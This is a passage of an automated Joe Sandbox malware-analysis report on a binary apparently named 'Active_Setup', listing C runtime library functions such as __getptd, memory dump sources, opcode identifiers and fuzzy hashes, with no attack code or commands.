                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsend
                                                                                                                                                  • String ID: Send failure: %s
                                                                                                                                                  • API String ID: 1802528911-857917747
                                                                                                                                                  • Opcode ID: 789906747ece19f3c779339ef0c2dada38ae5d5c45f438243c8c7852779e83df
                                                                                                                                                  • Instruction ID: 0f4956e1f27aaec9c5bdbe4a4e25278f6bf4900f6161718dd5ad1d9f7aecabad
                                                                                                                                                  • Opcode Fuzzy Hash: 789906747ece19f3c779339ef0c2dada38ae5d5c45f438243c8c7852779e83df
                                                                                                                                                  • Instruction Fuzzy Hash: EA01B1B5204304AFC720DB68DC84FA777E8FB89322F10455AF944C7240C639A8009F61
                                                                                                                                                  Function 01091348 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 010865F1: __getptd.LIBCMT ref: 010865F7
                                                                                                                                                    • Part of subcall function 010865F1: __getptd.LIBCMT ref: 01086607
                                                                                                                                                  • __getptd.LIBCMT ref: 01091357
                                                                                                                                                    • Part of subcall function 01087909: __getptd_noexit.LIBCMT ref: 0108790C
                                                                                                                                                    • Part of subcall function 01087909: __amsg_exit.LIBCMT ref: 01087919
                                                                                                                                                  • __getptd.LIBCMT ref: 01091365
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                  • String ID: csm
                                                                                                                                                  • API String ID: 803148776-1018135373
                                                                                                                                                  • Opcode ID: 0a4f4f6865025eb1d26a091e8466ca80fd7b9e4aece42d33b984e554c5363287
                                                                                                                                                  • Instruction ID: 0cf49879f7ef7070211fadf35deb1a48ed652bf68bcccdadfc9fad400dfc9599
                                                                                                                                                  • Opcode Fuzzy Hash: 0a4f4f6865025eb1d26a091e8466ca80fd7b9e4aece42d33b984e554c5363287
                                                                                                                                                  • Instruction Fuzzy Hash: 5001AD30A04307CBEF35AF68C460ABCB7F8AF10224F24C6AED4C096A51EB358590EF50